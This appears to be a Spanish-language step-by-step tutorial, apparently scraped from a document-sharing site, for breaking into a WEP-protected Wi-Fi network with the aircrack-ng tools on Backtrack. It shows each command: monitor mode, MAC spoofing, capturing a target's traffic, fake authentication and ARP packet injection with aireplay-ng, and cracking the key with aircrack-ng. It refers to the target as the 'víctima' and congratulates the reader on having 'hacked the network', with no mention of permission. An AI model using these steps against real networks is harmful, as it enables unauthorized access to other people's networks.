Documentos de Académico
Documentos de Profesional
Documentos de Cultura
live CD) o usar un virtualizador como virtualbox para montar la imagen, usen el que mas se
le facilite.
Una vez dentro de Backtrack con nuestra memoria USB wireles Linksys WUSB54GC
conectada abrimos una consola y ponemos lo siguiente para identificar nuestra interfaz de
red.
Bash | Copiar |?
1 airmon-ng
Bash | Copiar |?
1 airmon-ng stop wlan0
y después
Bash | Copiar |?
1 airmon-ng start wlan0
Bash | Copiar |?
1 macchanger –m 00:11:22:33:44:55 wlan0
y veremos algo como esto:
Bash | Copiar |?
1 airodump-ng wlan0
Para escanear las redes que tenemos a nuestro alrededor, aparecerá algo como esto:
ahora en esa misma ventana precionamos ctrl+c, aparecera la linea de comando y ponemos
la siguiente instrucción teniendo precaución de sustituir los datos entre comillas con la
información de nuestra víctima.
Bash | Copiar |?
1 airodump-ng -c "channel" -w guerrix --bssid "mac-a-atacar" wlan0
Bash | Copiar |?
1 airodump-ng -c 10 -w guerrix --bssid 00:1D:5A:19:05:11 wlan0
El recuadro en rojo debajo de #DATA indica la cantidad de paquetes que hemos inyectado
probablemente lo tengan en 0 o un numero demasiado bajo para cambiar eso hacemos lo
siguiente:
Abrimos una nueva terminal sin cerrar la que teníamos, ponemos el siguiente comando
teniendo cuidado de sustituir el texto entre comillas con los datos indicados:
Bash | Copiar |?
1 aireplay-ng -1 0 -a "mac-a-tacar" -h "mi-mac" wlan0
Que dando algo asi, recuerden que al principio cambiamos nuestra mac por
00:11:22:33:44:55
Bash | Copiar |?
1 aireplay-ng -1 0 -a 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0
al dar enter y si no tenemos ningun error ponemos el siguiente comando de igual manera
teniendo cuidado de sustituir el texto entre comillas con los datos indicados:
Bash | Copiar |?
1 aireplay-ng -3 -b "mac-a-tacar" -h "mi-mac" wlan0
En mi caso quedara:
Bash | Copiar |?
1 aireplay-ng -3 -b 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0
Al dar enter a esta ultima instrucción notaremos que empezamos a inyectar los paquetes y
si checamos la terminal que nos indica el #DATA veremos como ese valor se incrementa
rápidamente:
Una vez que el valor de #DATA pase los 30000 paquetes abrimos otra terminal, sin cerrar
las que tenemos abiertas y ponemos lo siguiente:
Nuevamente cuidado de sustituir lo que nos pide.
Bash | Copiar |?
1 aircrack-ng -b "mac-a-atacar" guerrix-01.cap
Bash | Copiar |?
1 aircrack-ng -b 00:1D:5A:19:05:11 guerrix-01.cap
Después de dar enter si obtenemos un KEY FOUND! entonces felicidades han hackeado la
red.
Pero de no ser asi no se mortifiquen esperen a que el #DATA incremente a 60000 e
ingrecen de nuevo el comando anterior y si sigue fallando intenten a los 90000 y así dejen
que se valla incrementando hasta que encuentren la clave. El tiempo que se emplee en
descifrar la clave varia según la dificultad de esta ultima